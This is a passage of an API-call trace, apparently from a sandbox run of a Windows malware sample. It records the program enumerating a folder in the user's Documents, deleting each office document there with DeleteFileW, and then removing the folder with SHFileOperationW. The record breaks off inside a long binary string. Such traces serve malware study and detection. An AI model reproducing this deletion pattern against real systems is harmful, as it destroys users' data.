dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0260.447] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/52zSkSwJyavPCLOxO1y", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y", lpFilePart=0x8bedfc*="52zSkSwJyavPCLOxO1y") returned 0x3b [0260.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0260.447] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y")) returned 0x10 [0260.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a64e980, ftCreationTime.dwHighDateTime=0x1d4c9e7, ftLastAccessTime.dwLowDateTime=0x582b0780, ftLastAccessTime.dwHighDateTime=0x1d4c608, ftLastWriteTime.dwLowDateTime=0x582b0780, ftLastWriteTime.dwHighDateTime=0x1d4c608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5860 [0260.448] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a64e980, ftCreationTime.dwHighDateTime=0x1d4c9e7, ftLastAccessTime.dwLowDateTime=0x582b0780, ftLastAccessTime.dwHighDateTime=0x1d4c608, ftLastWriteTime.dwLowDateTime=0x582b0780, ftLastWriteTime.dwHighDateTime=0x1d4c608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0260.448] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27db8bf0, ftCreationTime.dwHighDateTime=0x1d4cf2b, ftLastAccessTime.dwLowDateTime=0xa616c8d0, ftLastAccessTime.dwHighDateTime=0x1d4c59f, ftLastWriteTime.dwLowDateTime=0xa616c8d0, ftLastWriteTime.dwHighDateTime=0x1d4c59f, nFileSizeHigh=0x0, nFileSizeLow=0x11e45, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="0t93rMiMsezl_P.docx", cAlternateFileName="0T93RM~1.DOC")) returned 1 [0260.448] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y\\0t93rMiMsezl_P.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y\\0t93rmimsezl_p.docx")) returned 1 [0260.449] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73db0cc0, ftCreationTime.dwHighDateTime=0x1d4cfb6, ftLastAccessTime.dwLowDateTime=0x1ffdf3f0, ftLastAccessTime.dwHighDateTime=0x1d4d525, ftLastWriteTime.dwLowDateTime=0x1ffdf3f0, ftLastWriteTime.dwHighDateTime=0x1d4d525, nFileSizeHigh=0x0, nFileSizeLow=0x7f4c, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="J3YIfHRC1jydJjJ-f_of.doc", cAlternateFileName="J3YIFH~1.DOC")) returned 1 [0260.449] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y\\J3YIfHRC1jydJjJ-f_of.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y\\j3yifhrc1jydjjj-f_of.doc")) returned 1 [0260.450] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23a13f00, ftCreationTime.dwHighDateTime=0x1d4c817, ftLastAccessTime.dwLowDateTime=0x979b3810, ftLastAccessTime.dwHighDateTime=0x1d4d0bf, ftLastWriteTime.dwLowDateTime=0x979b3810, ftLastWriteTime.dwHighDateTime=0x1d4d0bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="J7HPn NPnSf9vV_C", cAlternateFileName="J7HPNN~1")) returned 1 [0260.450] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb5b400, ftCreationTime.dwHighDateTime=0x1d4d314, ftLastAccessTime.dwLowDateTime=0x7697e40, ftLastAccessTime.dwHighDateTime=0x1d4cd32, ftLastWriteTime.dwLowDateTime=0x7697e40, ftLastWriteTime.dwHighDateTime=0x1d4cd32, nFileSizeHigh=0x0, nFileSizeLow=0x726b, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="KrLYlK4Yf.ods", cAlternateFileName="KRLYLK~1.ODS")) returned 1 [0260.450] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y\\KrLYlK4Yf.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y\\krlylk4yf.ods")) returned 1 [0260.452] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7460aba0, ftCreationTime.dwHighDateTime=0x1d4c9d0, ftLastAccessTime.dwLowDateTime=0x10b933b0, ftLastAccessTime.dwHighDateTime=0x1d4c7c3, ftLastWriteTime.dwLowDateTime=0x10b933b0, ftLastWriteTime.dwHighDateTime=0x1d4c7c3, nFileSizeHigh=0x0, nFileSizeLow=0xa213, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="Pcr_3aQk2.odp", cAlternateFileName="PCR_3A~1.ODP")) returned 1 [0260.452] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y\\Pcr_3aQk2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y\\pcr_3aqk2.odp")) returned 1 [0260.453] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3667d0, ftCreationTime.dwHighDateTime=0x1d4cbb8, ftLastAccessTime.dwLowDateTime=0xed6545d0, ftLastAccessTime.dwHighDateTime=0x1d4c708, ftLastWriteTime.dwLowDateTime=0xed6545d0, ftLastWriteTime.dwHighDateTime=0x1d4c708, nFileSizeHigh=0x0, nFileSizeLow=0xe206, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="qQkMv02LYN 3ehvwG8a_.ods", cAlternateFileName="QQKMV0~1.ODS")) returned 1 [0260.453] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y\\qQkMv02LYN 3ehvwG8a_.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y\\qqkmv02lyn 3ehvwg8a_.ods")) returned 1 [0260.454] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3667d0, ftCreationTime.dwHighDateTime=0x1d4cbb8, ftLastAccessTime.dwLowDateTime=0xed6545d0, ftLastAccessTime.dwHighDateTime=0x1d4c708, ftLastWriteTime.dwLowDateTime=0xed6545d0, ftLastWriteTime.dwHighDateTime=0x1d4c708, nFileSizeHigh=0x0, nFileSizeLow=0xe206, dwReserved0=0x1a1a, dwReserved1=0x4, cFileName="qQkMv02LYN 3ehvwG8a_.ods", cAlternateFileName="QQKMV0~1.ODS")) returned 0 [0260.454] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0260.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.455] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0260.455] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.456] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0260.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/52zSkSwJyavPCLOxO1y", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y", lpFilePart=0x8bf658*="52zSkSwJyavPCLOxO1y") returned 0x3b [0260.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0260.459] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y")) returned 0x10 [0260.459] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\52zSkSwJyavPCLOxO1y", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\